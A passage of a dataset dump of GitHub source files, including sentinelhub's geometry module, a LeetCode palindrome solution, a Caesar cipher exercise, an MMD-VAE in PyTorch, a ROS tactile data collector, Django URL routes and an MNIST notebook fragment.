as a geometric object, and then\n define a new bounding box from boundaries of that geometry. The resulting bounding box might be larger than\n original bounding box, but it will always completely cover it.\n\n :param crs: target CRS\n :param always_xy: Parameter that is passed to `pyproj.Transformer` object and defines axis order for\n transformation. The default value `True` is in most cases the correct one.\n :return: Bounding box in target CRS\n \"\"\"\n bbox_geometry = Geometry(self.geometry, self.crs)\n bbox_geometry = bbox_geometry.transform(crs, always_xy=always_xy)\n return bbox_geometry.bbox\n\n def apply(self, operation: Callable[[float, float], tuple[float, float]]) -> BBox:\n \"\"\"Applies a function to lower left and upper right pairs of coordinates of the bounding box to create a new\n bounding box.\"\"\"\n return BBox((operation(*self.lower_left), operation(*self.upper_right)), crs=self.crs)\n\n def buffer(self, buffer: float | tuple[float, float], *, relative: bool = True) -> BBox:\n \"\"\"Provides a new bounding box with a size that is changed either by a relative or an absolute buffer.\n\n :param buffer: The buffer can be provided either as a single number or a tuple of 2 numbers, one for buffer in\n horizontal direction and one for buffer in vertical direction. The buffer can also be negative as long as\n this doesn't reduce the bounding box into nothing.\n :param relative: If `True` the given buffer values will be interpreted as a percentage of distance between\n bounding box center point and its side edge (not to distance between opposite sides!). If `False` the given\n buffer will be interpreted as an absolute buffer measured in bounding box coordinate units.\n :return: A new bounding box of buffered size.\n \"\"\"\n if isinstance(buffer, tuple):\n buffer_x, buffer_y = buffer\n elif isinstance(buffer, (int, float)):\n buffer_x, buffer_y = buffer, buffer\n else:\n raise ValueError(f\"Buffer should be a number or a tuple of 2 numbers, got {type(buffer)}\")\n\n size_x, size_y = self.max_x - self.min_x, self.max_y - self.min_y\n\n if relative:\n buffer_x = buffer_x * size_x / 2\n buffer_y = buffer_y * size_y / 2\n\n for absolute_buffer, size, direction in [(buffer_x, size_x, \"horizontal\"), (buffer_y, size_y, \"vertical\")]:\n if 2 * absolute_buffer + size <= 0:\n raise ValueError(\n f\"Negative buffer is too large, cannot reduce the bounding box to nothing in {direction} direction\"\n )\n\n return BBox(\n (\n self.min_x - buffer_x,\n self.min_y - buffer_y,\n self.max_x + buffer_x,\n self.max_y + buffer_y,\n ),\n self.crs,\n )\n\n def get_polygon(self, reverse: bool = False) -> tuple[tuple[float, float], ...]:\n \"\"\"Returns a tuple of coordinates of 5 points describing a polygon. Points are listed in clockwise order, first\n point is the same as the last.\n\n :param reverse: `True` if x and y coordinates should be switched and `False` otherwise\n :return: `((x_1, y_1), ... , (x_5, y_5))`\n \"\"\"\n bbox = self.reverse() if reverse else self\n return (\n (bbox.min_x, bbox.min_y),\n (bbox.min_x, bbox.max_y),\n (bbox.max_x, bbox.max_y),\n (bbox.max_x, bbox.min_y),\n (bbox.min_x, bbox.min_y),\n )\n\n @property\n def geometry(self) -> shapely.geometry.Polygon:\n \"\"\"Returns polygon geometry in shapely format\n\n :return: A polygon in shapely format\n \"\"\"\n return shapely.geometry.Polygon(self.get_polygon())\n\n def get_partition(\n self,\n num_x: int | None = None,\n num_y: int | None = None,\n size_x: float | None = None,\n size_y: float | None = None,\n ) -> list[list[BBox]]:\n \"\"\"Partitions bounding box into smaller bounding boxes of the same size.\n\n If `num_x` and `num_y` are specified, the total number of BBoxes is know but not the size. If `size_x` and\n `size_y` are provided, the BBox size is fixed but the number of BBoxes is not known in advance. In the latter\n case, the generated bounding boxes might cover an area larger than the parent BBox.\n\n :param num_x: Number of parts BBox will be horizontally divided into.\n :param num_y: Number of parts BBox will be vertically divided into.\n :param size_x: Physical dimension of BBox along easting coordinate\n :param size_y: Physical dimension of BBox along northing coordinate\n :return: Two-dimensional list of smaller bounding boxes. Their location is\n \"\"\"\n if (num_x is not None and num_y is not None) and (size_x is None and size_y is None):\n size_x, size_y = (self.max_x - self.min_x) / num_x, (self.max_y - self.min_y) / num_y\n elif (size_x is not None and size_y is not None) and (num_x is None and num_y is None):\n num_x, num_y = ceil((self.max_x - self.min_x) / size_x), ceil((self.max_y - self.min_y) / size_y)\n else:\n raise ValueError(\"Not supported partition. Either (num_x, num_y) or (size_x, size_y) must be specified\")\n\n return [\n [\n BBox(\n (\n (self.min_x + i * size_x, self.min_y + j * size_y),\n (self.min_x + (i + 1) * size_x, self.min_y + (j + 1) * size_y),\n ),\n crs=self.crs,\n )\n for j in range(num_y)\n ]\n for i in range(num_x)\n ]\n\n def get_transform_vector(self, resx: float, resy: float) -> tuple[float, float, float, float, float, float]:\n \"\"\"Given resolution it returns a transformation vector\n\n :param resx: Resolution in x direction\n :param resy: Resolution in y direction\n :return: A tuple with 6 numbers representing transformation vector\n \"\"\"\n return self.min_x, self._parse_resolution(resx), 0, self.max_y, 0, -self._parse_resolution(resy)\n\n @staticmethod\n def _parse_resolution(res: str | int | float) -> float:\n \"\"\"Helper method for parsing given resolution. It will also try to parse a string into float\n\n :return: A float value of resolution\n \"\"\"\n if isinstance(res, str):\n return float(res.strip(\"m\"))\n if isinstance(res, (int, float)):\n return float(res)\n\n raise TypeError(f\"Resolution should be a float, got resolution of type {type(res)}\")\n\n\nclass Geometry(_BaseGeometry):\n \"\"\"A class that combines shapely geometry with coordinate reference system. It currently supports polygons and\n multipolygons.\n\n It can be initialized with any of the following geometry representations:\n - `shapely.geometry.Polygon` or `shapely.geometry.MultiPolygon`\n - A GeoJSON dictionary with (multi)polygon coordinates\n - A WKT string with (multi)polygon coordinates\n \"\"\"\n\n def __init__(self, geometry: Polygon | MultiPolygon | dict | str, crs: CRS):\n \"\"\"\n :param geometry: A polygon or multipolygon in any valid representation\n :param crs: Coordinate reference system of the geometry\n \"\"\"\n self._geometry = self._parse_geometry(geometry)\n\n super().__init__(crs)\n\n def __repr__(self) -> str:\n \"\"\"Method for class representation\"\"\"\n return f\"{self.__class__.__name__}({self.wkt}, crs={self.crs!r})\"\n\n def __eq__(self, other: object) -> bool:\n \"\"\"Method for comparing two Geometry classes\n\n :param other: Another Geometry object\n :return: `True` if geometry objects have the same geometry and CRS and `False` otherwise\n \"\"\"\n if isinstance(other, Geometry):\n return self.geometry == other.geometry and self.crs is other.crs\n return False\n\n def reverse(self) -> Geometry:\n \"\"\"Returns a new Geometry object where x and y coordinates are switched\n\n :return: New Geometry object with switched coordinates\n \"\"\"\n return Geometry(shapely.ops.transform(lambda x, y: (y, x), self.geometry), crs=self.crs)\n\n def transform(self, crs: CRS, always_xy: bool = True) -> Geometry:\n \"\"\"Transforms Geometry from current CRS to target CRS\n\n :param crs: target CRS\n :param always_xy: Parameter that is passed to `pyproj.Transformer` object and defines axis order for\n transformation. The default value `True` is in most cases the correct one.\n :return: Geometry in target CRS\n \"\"\"\n new_crs = CRS(crs)\n\n geometry = self.geometry\n if new_crs is not self.crs:\n transform_function = self.crs.get_transform_function(new_crs, always_xy=always_xy)\n geometry = shapely.ops.transform(transform_function, geometry)\n\n return Geometry(geometry, crs=new_crs)\n\n def apply(self, operation: Callable[[float, float], tuple[float, float]]) -> Geometry:\n \"\"\"Applies a function to each pair of vertex coordinates of the geometry to create a new geometry.\"\"\"\n return Geometry(shapely.ops.transform(operation, self.geometry), crs=self.crs)\n\n @classmethod\n def from_geojson(cls, geojson: dict, crs: CRS | None = None) -> Geometry:\n \"\"\"Create Geometry object from geojson. It will parse crs from geojson (if info is available),\n otherwise it will be set to crs (WGS84 if parameter is empty)\n\n :param geojson: geojson geometry (single feature)\n :param crs: crs to be used if not available in geojson, CRS.WGS84 if not provided\n :return: Geometry object\n \"\"\"\n with contextlib.suppress(KeyError, AttributeError, TypeError):\n crs = CRS(geojson[\"crs\"][\"properties\"][\"name\"])\n\n if not crs:\n crs = CRS.WGS84\n\n return cls(geojson, crs=crs)\n\n @property\n def geometry(self) -> Polygon | MultiPolygon:\n \"\"\"Returns shapely object representing geometry in this class\n\n :return: A polygon or a multipolygon in shapely format\n \"\"\"\n return self._geometry\n\n @property\n def bbox(self) -> BBox:\n \"\"\"Returns BBox object representing bounding box around the geometry\n\n :return: A bounding box, with same CRS\n \"\"\"\n return BBox(self.geometry.bounds, self.crs)\n\n @staticmethod\n def _parse_geometry(geometry: Polygon | MultiPolygon | dict | str) -> Polygon | MultiPolygon:\n \"\"\"Parses given geometry into shapely object\n\n :param geometry: A representation of the geometry\n :return: Shapely polygon or multipolygon\n :raises TypeError\n \"\"\"\n if isinstance(geometry, str):\n geometry = shapely.wkt.loads(geometry)\n else:\n try:\n geometry = shapely.geometry.shape(geometry)\n except (GeometryTypeError, AttributeError) as exception:\n raise ValueError(f\"Unable to parse value {geometry} as a geometry.\") from exception\n\n if not isinstance(geometry, (Polygon, MultiPolygon)):\n raise ValueError(f\"Supported geometry types are polygon and multipolygon, got {type(geometry)}\")\n\n return geometry\n","repo_name":"sentinel-hub/sentinelhub-py","sub_path":"sentinelhub/geometry.py","file_name":"geometry.py","file_ext":"py","file_size_in_byte":23000,"program_lang":"python","lang":"en","doc_type":"code","stars":740,"dataset":"github-code","pt":"72"} +{"seq_id":"8551369246","text":"# https://leetcode.com/problems/valid-palindrome/\n\nclass Solution:\n def isPalindrome(self, s: str) -> bool:\n s = ''.join(char.lower() for char in s if char.isalnum())\n\n if len(s) <= 1:\n return True\n\n def validPalindrome(s, l, r):\n while l >= 0 and r < len(s) and s[l] == s[r]:\n l -= 1\n r += 1\n\n if l == -1 and r == len(s):\n return True\n else:\n return False\n\n if len(s) % 2 == 0:\n return validPalindrome(s, len(s) // 2 - 1 ,len(s) // 2)\n else:\n return validPalindrome(s, len(s) // 2, len(s) // 2)\n\n\ns = \"aa\"\n\nsol = Solution()\nprint(sol.isPalindrome(s))","repo_name":"jeffreytigerwang/Python-Practice","sub_path":"easy/Valid Palindrome.py","file_name":"Valid Palindrome.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30476900289","text":"from utils import get_logger\nfrom crawler.frontier import Frontier\nfrom crawler.worker import Worker\n\nclass Crawler(object):\n def __init__(self, config, restart, wordFreq, wordCount, subDom, stopwords, frontier_factory=Frontier, worker_factory=Worker):\n self.config = config\n self.logger = get_logger(\"CRAWLER\")\n self.frontier = frontier_factory(config, restart)\n self.workers = list()\n self.worker_factory = worker_factory\n self.wordFreq = wordFreq\n self.wordCount = wordCount\n self.subDom = subDom\n self.stopwords = stopwords\n\n def start_async(self):\n self.workers = [\n self.worker_factory(worker_id, self.config, self.frontier, self.wordFreq, self.wordCount, self.subDom, self.stopwords)\n for worker_id in range(self.config.threads_count)]\n for worker in self.workers:\n worker.start()\n\n def start(self):\n self.start_async()\n self.join()\n\n def join(self):\n for worker in self.workers:\n worker.join()\n","repo_name":"AndyJZhao24/Web-Crawler","sub_path":"crawler/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18452801950","text":"def score(abc, xyz):\n res = 0\n if xyz == \"X\":\n res = 1\n elif xyz == \"Y\":\n res = 2\n elif xyz == \"Z\":\n res = 3\n if abc == \"A\" and xyz == \"X\" or abc == \"B\" and xyz == \"Y\" or abc == \"C\" and xyz == \"Z\":\n res += 3\n if abc == \"A\" and xyz == \"Y\" or abc == \"B\" and xyz == \"Z\" or abc == \"C\" and xyz == \"X\":\n res += 6\n return res\n\nans = 0\nwith open(\"in.txt\", \"r\") as f:\n f = f.read().split(\"\\n\")\n for ff in f:\n ans += score(ff[0], ff[2])\nprint(ans)\n\n\n","repo_name":"ludvig-sandh/AdventOfCode22","sub_path":"Day 2/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27661974000","text":"ALPHABET = ('абвгдеёжзиклмнопрстуфхчшщъыьэюя'\n 'АБВГДЕЁЖЗИКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯ')\ndef encryption_caesar(msg, set_caesar):\n encrypted_alphabet = ALPHABET[set_caesar:] + ALPHABET[:set_caesar]\n encrypted = []\n for char in msg:\n index = get_char_index(char, ALPHABET)\n encrypted_char = encrypted_alphabet[index] if index >= 0 else char\n encrypted.append(encrypted_char)\n return ''.join(encrypted)\ndef get_char_index(char, alphabet):\n char_index = alphabet.find(char)\n return char_index\ndef decryption_caesar(msg, offset=None):\n assert isinstance(offset, object)\n encrypted_alphabet = ALPHABET[offset:] + ALPHABET[:offset]\n decrypted = []\n if not offset:\n dictionary = ['Привет', 'пока', 'что']\n for offset_1 in range(len(ALPHABET)):\n encrypted_alphabet = ALPHABET[offset_1:] + ALPHABET[:offset_1]\n for char in msg:\n index = get_char_index(char, encrypted_alphabet)\n encrypted_char = ALPHABET[index] if index >= 0 else char\n decrypted.append(encrypted_char)\n decrypted = ''.join(decrypted)\n word: str\n for word in dictionary:\n if word in decrypted:\n return decrypted\n decrypted = []\n else:\n for char in msg:\n index = get_char_index(char, encrypted_alphabet)\n encrypted_char = encrypted_alphabet[index - offset] \\\n if index >= 0 else char\n decrypted.append(encrypted_char)\n return ''.join(decrypted)\n return f'Не удалось расшифровать сообщение {msg:}'\nif __name__ == '__main__':\n MESS = 'Привет! Мир'\n ST = 5\n ENCRYPTED_MESSAGE = encryption_caesar(MESS, ST)\n print(f'Введите Сообщение: {MESS:}')\n print(f'Зашифрованное сообщение: {ENCRYPTED_MESSAGE:}')\n print(f'Расшифрованное сообщение: {decryption_caesar(ENCRYPTED_MESSAGE):}')\n","repo_name":"eugene-okulik/QAP-08onl","sub_path":"homework/wolk/wolk_sergey_homework_7/hwork_1.py","file_name":"hwork_1.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70127236714","text":"import sys\nimport common\nimport argparse\n\n\"\"\"\nScript that takes a SAM file as input and outputs a SAM file containing\nonly multimapped reads in order for them to be filtered, stored in a file or pipelined\npiped to another process\n\nauthor : Luqman FERDJANI\n\"\"\"\n\n\"\"\"\nThis function counting for occurrences of reads in a SAM file and returns a set\ncontaining the IDs of the multimapped sequences\n\n:param IOstream: IO stream of SAM file\n:return: set of multimapped reads IDs\n\"\"\"\ndef extractMultiMappings(IOstream):\n IOstream.seek(0)\n multimappedReads = set()\n occurrences = dict()\n #We start by skipping the @ lines\n line = common.skipAts(IOstream)\n while line!='':\n readID = line.split()[0]\n if readID in occurrences:\n if occurrences[readID]==1:\n multimappedReads.add(readID)\n occurrences[readID]+=1\n else:\n occurrences[readID]=1\n line = IOstream.readline()\n return multimappedReads\n\n\"\"\"\nThis function takes a set containing the IDs of multimapped reads and a SAM file\nand outputs on stdout only the SAM file lines about the aforementionned reads\n\n:param multimappedReadsSet: set containing the IDs of multimappedReads\n:param IOstream: IO stream of SAM file\n\"\"\"\ndef outputMultimappedReads(IOstream,multimappedReadsSet):\n IOstream.seek(0)\n line = common.outputHeader(IOstream)\n while line!='':\n readID = line.split()[0]\n if readID in multimappedReadsSet:\n sys.stdout.write(line)\n line = IOstream.readline()\n\n\nif __name__=='__main__':\n\n parser = parser = argparse.ArgumentParser(description=\"Takes a SAM file and outputs only the multimapped reads on stdout while keeping the SAM format\")\n\n parser.add_argument(\"sam_files\", help=\"The sam file to be filtered by this script\")\n\n args = parser.parse_args()\n\n\n samFile = open(args.sam_files,'r')\n multimappedReadsSet = extractMultiMappings(samFile)\n outputMultimappedReads(samFile,multimappedReadsSet)\n samFile.close()\n","repo_name":"leonhart8/multimappings_study","sub_path":"multimapsfilter.py","file_name":"multimapsfilter.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41305836822","text":"# Alice is going to the mad tea party, to see her friends. On the way to the party,\n# she needs to collect bags of tea.\n# You will be given an integer n for the size of the Wonderland territory with a square shape.\n# On the following n lines, you will receive the rows of the territory:\n# • Alice will be placed in a random position, marked with the letter \"A\".\n# • On the territory, there will be bags of tea, represented as numbers.\n\n# If Alice steps on a number position, she collects the tea bags and increases the quantity\n# with the corresponding number.\n# • There will always be one rabbit hole on the territory marked with the letter \"R\".\n# • All of the empty positions will be marked with \".\".\n# After the field state, you will be given commands for Alice's movements.\n# Move commands can be: \"up\", \"down\", \"left\" or \"right\".\n# When Alice collects at least 10 bags of tea, she is ready to go to the tea party,\n# and she does not need to continue collecting.\n# Otherwise, if she steps on the rabbit hole or goes out of the territory, she can't return,\n# and the program ends.\n# In the end, the path she walked had to be marked with '*'.\n\nn = int(input())\nM = [[int(m) if m.isnumeric() else str(m) for m in input().split()] for _ in range(n)]\nA = (0, 0)\ndirections = {\n 'up': lambda r, c: (r - 1, c),\n 'down': lambda r, c: (r + 1, c),\n 'left': lambda r, c: (r, c - 1),\n 'right': lambda r, c: (r, c + 1),\n}\ntea_bags = 0\nRabbit_hole = False\nfor row in range(n):\n for col in range(n):\n if M[row][col] == 'A':\n A = (row, col)\n M[row][col] = '*'\n\n while tea_bags < 10 and not Rabbit_hole:\n command = input()\n step_r, step_c = directions[command](A[0], A[1]) # Passing Alice position to the lambda func\n if 0 <= step_r <= n - 1 and 0 <= step_c <= n - 1: # Check new position is valid\n A = (step_r, step_c)\n if M[step_r][step_c] == 'R':\n M[step_r][step_c] = '*'\n Rabbit_hole = True\n elif M[step_r][step_c] == '.':\n M[step_r][step_c] = '*'\n elif M[step_r][step_c] == '*':\n continue\n else:\n tea_bags += M[step_r][step_c] # found tea bags\n M[step_r][step_c] = '*'\n else:\n break\n\nif tea_bags >= 10 and not Rabbit_hole:\n print(\"She did it! She went to the party.\")\n [print(*m) for m in M]\nelse:\n print(\"Alice didn't make it to the tea party.\")\n [print(*m) for m in M]\n","repo_name":"h-dmt/Python_Advanced","sub_path":"4_multidimensional_lists/alice_in_wonderland.py","file_name":"alice_in_wonderland.py","file_ext":"py","file_size_in_byte":2677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11570173416","text":"import urllib.request\n\nprint('Beginning file update...')\n \nurllib.request.urlretrieve (\"https://github.com/xXxHotShotxXx/test/archive/master.zip\",\"update.zip\")\n\nprint('Update complete')\nimport zipfile\nprint('Beginning unzip update...')\nzip_ref = zipfile.ZipFile(\"update.zip\", 'r')\nzip_ref.extractall(\"\")\nzip_ref.close()\nprint(\"unzip complete\")\n","repo_name":"xXxHotShotxXx/test","sub_path":"update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26192308635","text":"import torch\nfrom torch import nn, optim\nfrom torch.utils.data import DataLoader\nfrom torch.nn import functional as F\nfrom torchvision import datasets, transforms\nimport numpy as np\n\n\"\"\"\nMMD Objective using Gaussian Kernel.\nThe repo is from https://github.com/Saswatm123/MMD-VAE/blob/master/MMD_VAE.ipynb\n\"\"\"\ndef gaussian_kernel(a, b):\n dim1_1, dim1_2 = a.shape[0], b.shape[0]\n depth = a.shape[1]#depth = LATENT_SIZE\n a = a.view(dim1_1, 1, depth)\n b = b.view(1, dim1_2, depth)\n a_core = a.expand(dim1_1, dim1_2, depth)\n b_core = b.expand(dim1_1, dim1_2, depth)\n numerator = (a_core - b_core).pow(2).mean(2)/depth\n return torch.exp(-numerator)\n\ndef MMD(a, b):\n return gaussian_kernel(a, a).mean() + gaussian_kernel(b, b).mean() - 2*gaussian_kernel(a, b).mean()\n\n\nclass Reshape(nn.Module):\n def __init__(self, *target_shape):\n super().__init__()\n self.target_shape = target_shape\n def forward(self, x):\n return x.view(*self.target_shape)\n\nclass MMD_VAE(nn.Module):\n def __init__(self,LATENT_SIZE):\n super().__init__()\n self.encoder = nn.Sequential(\n nn.Conv2d(in_channels = 1, out_channels = 5, kernel_size = 5, padding = 2),\n nn.LeakyReLU(),\n nn.Conv2d(in_channels = 5, out_channels = 5, kernel_size = 5),\n nn.LeakyReLU(),\n nn.Conv2d(in_channels = 5, out_channels = 5, kernel_size = 5),\n nn.LeakyReLU(),\n Reshape([-1,5*20*20]),\n nn.Linear(in_features = 5*20*20, out_features = 5*12),\n nn.LeakyReLU(),\n nn.Linear(in_features = 5*12, out_features = LATENT_SIZE)\n )\n self.decoder = nn.Sequential(\n nn.Linear(in_features = LATENT_SIZE, out_features = 5*12),\n nn.ReLU(),\n nn.Linear(in_features = 5*12, out_features = 24*24),\n nn.ReLU(),\n Reshape([-1,1,24,24]),\n nn.ConvTranspose2d(in_channels = 1, out_channels = 5, kernel_size = 3),\n nn.ReLU(),\n nn.ConvTranspose2d(in_channels = 5, out_channels = 10, kernel_size = 5),\n nn.ReLU(),\n nn.Conv2d(in_channels = 10, out_channels = 1, kernel_size = 3),\n nn.Sigmoid()\n )\n \n def forward(self, X):\n if self.training:\n latent = self.encoder(X)\n return self.decoder(latent), latent\n else:\n return self.decoder( self.encoder(X) )\n\n\nif __name__ == \"__main__\":\n DEVICE = 'cuda' if torch.cuda.is_available() else 'cpu'\n SEED, BATCH_SIZE, LATENT_SIZE = 123, 128, 4\n torch.manual_seed(SEED)\n # DATA I/O\n train = datasets.MNIST('mnist',train=True,transform=transforms.ToTensor(),download=True)\n train = train.data.float().to(DEVICE)/256# Converting from integer to float\n train_loader = DataLoader(dataset = train,batch_size = BATCH_SIZE,shuffle = True)\n # MODEL\n net = MMD_VAE(LATENT_SIZE).to(DEVICE)\n optimizer = optim.Adam(net.parameters(),lr=1e-4)\n net.train()\n for batchnum, X in enumerate(train_loader):\n optimizer.zero_grad()\n X = X.reshape(-1, 1, 28, 28)\n print(\"X.shape: \",X.shape)#torch.Size([96, 1, 28, 28])\n _, mu = net(X)\n print(\"mu.shape: \",mu.shape)#torch.Size([96, 4])\n mmd = MMD(torch.randn(96,LATENT_SIZE,requires_grad=False).to(DEVICE), mu)\n mmd.backward()\n optimizer.step()\n print(\"mmd loss: \",mmd.item())\n\n\n\n\n\n","repo_name":"ivclab/CVS","sub_path":"mmdloss.py","file_name":"mmdloss.py","file_ext":"py","file_size_in_byte":3436,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"72"} +{"seq_id":"6963648037","text":"import os\nimport time\nimport rospy\nimport pickle\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom cv_bridge import CvBridge\nfrom sensor_msgs.msg import Image, JointState\nfrom tactile_msgs.msg import TactileState\nfrom geometry_msgs.msg import WrenchStamped\n\nfrom tf import TransformListener\nfrom datetime import datetime\nfrom learn_placing import dataset_path, datefmt\nfrom learn_placing.common import v2l, line_angle_from_rotation, models_theta_plot, preprocess_myrmex\n\n\nclass DataCollector:\n world_frame = \"base_footprint\"\n grasping_frame = \"gripper_grasping_frame\"\n left_finger_name = \"gripper_left_finger_joint\"\n right_finger_name = \"gripper_right_finger_joint\"\n object_frame = \"object\"\n mm_left, mm_right, ft, js = None, None, None, None # message data variables\n gr_idx, gl_idx = None, None # JointState indices for left and right finger joint values\n\n def __init__(self, save_path):\n self.count = 1\n self.save_path = save_path\n self.pics_path = f\"{self.save_path}/pics/\"\n\n os.makedirs(self.save_path, exist_ok=True)\n os.makedirs(self.pics_path, exist_ok=True)\n\n self.ftsub = rospy.Subscriber(\"/wrist_ft\", WrenchStamped, callback=self.ft_cb)\n self.tlsub = rospy.Subscriber(\"/tactile_left\", TactileState, callback=self.tl_cb)\n self.trsub = rospy.Subscriber(\"/tactile_right\", TactileState, callback=self.tr_cb)\n self.jssub = rospy.Subscriber(\"/joint_states\", JointState, callback=self.js_cb)\n\n self.bridge = CvBridge()\n self.imgpub = rospy.Publisher(\"/collector_image\", Image, queue_size=1)\n\n self.li = TransformListener()\n self.li.waitForTransform(self.world_frame, self.grasping_frame, rospy.Time(0), rospy.Duration(5))\n \n def tl_cb(self, m): self.mm_left = preprocess_myrmex(m.sensors[0].values)\n def tr_cb(self, m): self.mm_right = preprocess_myrmex(m.sensors[0].values)\n def ft_cb(self, m): self.ft = np.concatenate([v2l(m.wrench.force), v2l(m.wrench.torque)])\n def js_cb(self, m): self.js = {self.right_finger_name: m.position[m.name.index(self.right_finger_name)], self.left_finger_name: m.position[m.name.index(self.left_finger_name)]}\n\n\n def reset_data(self):\n self.mm_left, self.mm_right, self.ft, self.js = None, None, None, None\n\n def collect(self):\n print(f\"collecting sample {self.count}\")\n while np.any(self.mm_left == None) or np.any(self.mm_right == None) or np.any(self.ft == None) or self.js is None:\n print(\"waiting for data ...\")\n rospy.Rate(2).sleep()\n\n # get gripper and object orientations\n (_, Qwg) = self.li.lookupTransform(self.world_frame, self.grasping_frame, rospy.Time())\n try:\n # TODO make this more sensitive to lost TFs while avoiding extrapolation into the future exception\n (_, Qwo) = self.li.lookupTransform(self.world_frame, self.object_frame, rospy.Time())\n (_, Qgo) = self.li.lookupTransform(self.grasping_frame, self.object_frame, rospy.Time())\n except Exception as e:\n pass\n # print(f\"ERROR couldn't get transform. ¿is the object being detected?\\n{e}\")\n # return False\n\n now = datetime.now().strftime(datefmt)\n\n Qwg = np.array(Qwg)\n # Qgo = np.array(Qgo)\n # Qwo = np.array(Qwo)\n\n # preprocess data\n mm = np.squeeze(np.stack([self.mm_left.copy(), self.mm_right.copy()]))\n # lblth = line_angle_from_rotation(Qgo)\n\n sname = f\"{self.count}_{now}\"\n with open(f\"{self.save_path}/{sname}.pkl\", \"wb\") as f:\n pickle.dump({\n \"mm\": mm,\n \"joints\": self.js,\n \"ft\": self.ft,\n \"Qwg\": Qwg,\n # \"Qgo\": Qgo,\n # \"Qwo\": Qwo\n }, f)\n \n scale=100\n fig, ax = plt.subplots(ncols=1, figsize=0.8*np.array([10,9]))\n\n lines = [\n # [lblth, f\"OptiTrack (lblth)\", \"green\"],\n ]\n models_theta_plot(\n mm_imgs=mm,\n noise_thresh=0.0,\n ax=ax,\n fig=fig,\n scale=scale,\n lines=lines\n )\n\n ax.set_title(f\"sample {self.count}@{now}\")\n fig.tight_layout()\n fig.canvas.draw()\n fig.savefig(f\"{self.pics_path}{sname}.png\")\n\n # Now we can save it to a numpy array.\n data = np.frombuffer(fig.canvas.tostring_rgb(), dtype=np.uint8)\n data = data.reshape(fig.canvas.get_width_height()[::-1] + (3,))\n\n imgmsg = self.bridge.cv2_to_imgmsg(data, encoding=\"rgb8\")\n self.imgpub.publish(imgmsg)\n plt.close()\n\n self.reset_data()\n self.count += 1\n print(\"done.\")\n\n \n\nif __name__ == \"__main__\":\n\n rospy.init_node(\"collect_data\")\n save_path = f\"{dataset_path}cloth2/no_cloth\"\n dc = DataCollector(save_path)\n\n print(f\"saving data in {save_path}\")\n while not rospy.is_shutdown():\n a = input()\n if a.lower() == \"q\": break\n # for _ in range(5):\n dc.collect()\n time.sleep(0.3)\n","repo_name":"llach/learn_placing","sub_path":"execute_placing/collect_data.py","file_name":"collect_data.py","file_ext":"py","file_size_in_byte":5097,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"21895687395","text":"\nfrom django.conf.urls import patterns, url, include\n\nfrom django.contrib import admin\n\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'pb.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n url(r'^admin/', include(admin.site.urls)),\n\n #(r'^js/(?P.*)$','django.views.static.serve',{'document_root':settings.JS_STATIC_PATH}),\n \n #(r'^css/(?P.*)$','django.views.static.serve',{'document_root':settings.CSS_STATIC_PATH}),\n \n #(r'^html/(?P.*)$','django.views.static.serve',{'document_root':settings.HTML_STATIC_PATH}),\n \n #(r'^images/(?P.*)$','django.views.static.serve',{'document_root':settings.IMAGES_STATIC_PATH}),\n \n url(r'^$', 'pb.views.index'),\n\n (r'^static/(?P.*)$','django.views.static.serve',{'document_root':settings.STATICFILES_DIRS,'show_indexes': True}),\n \n url(r'^index$', 'pb.views.index'),\n \n url(r'^about$', 'pb.views.about'),\n \n url(r'^list$', 'pb.views.list'),\n \n url(r'^editor$', 'pb.views.editor'),\n \n url(r'^pagelist', 'pb.views.pagelist'),\n) \n","repo_name":"zimuxh/pb","sub_path":"pb/src/pb/pb/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15218351326","text":"\n# coding: utf-8\n\n# Reference : \n# https://github.com/uosdmlab/tensorflow-tutorial/blob/master/notebooks/4.MNIST%20with%20CNN.ipynb\n# https://www.kaggle.com/innerproduct/state-farm-distracted-driver-detection/tensorflow\n\n# In[2]:\n\nimport pandas as pd\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nDROPOUT=0.5\nTRAINING_ITERATIONS =10000\nLEARNING_RATE = 1e-4\nValidation_size=1000\nBATCH_SIZE=50\n\n\n# In[3]:\n\ndata=pd.read_csv('~/Documents/GIT_HUB/MNIST/train.csv')\n\n\n# In[4]:\n\nimages=data.iloc[:,1:].values.astype(np.float);\nimages=np.multiply(images,1.0/255.0);\n#this is done to change the shape of the array\nimage_size=images.shape[1]\nimage_width = image_height = np.ceil(np.sqrt(image_size)).astype(np.uint8)\n\n\n# In[5]:\n\nlabels_count=data[[0]].values.ravel()\nlabel = np.unique(labels_count).shape[0]\n\n\n# In[6]:\n\ndef dense(labels_dense, num_classes):\n num_labels = labels_dense.shape[0]\n res=np.zeros(shape=(num_labels,num_classes));\n for i in range (0,num_labels):\n res[i,labels_dense[i]]=1;\n return res;\n\nhot_label=dense(labels_count,label);\nhot_label = hot_label.astype(np.uint8)\n\n\n# 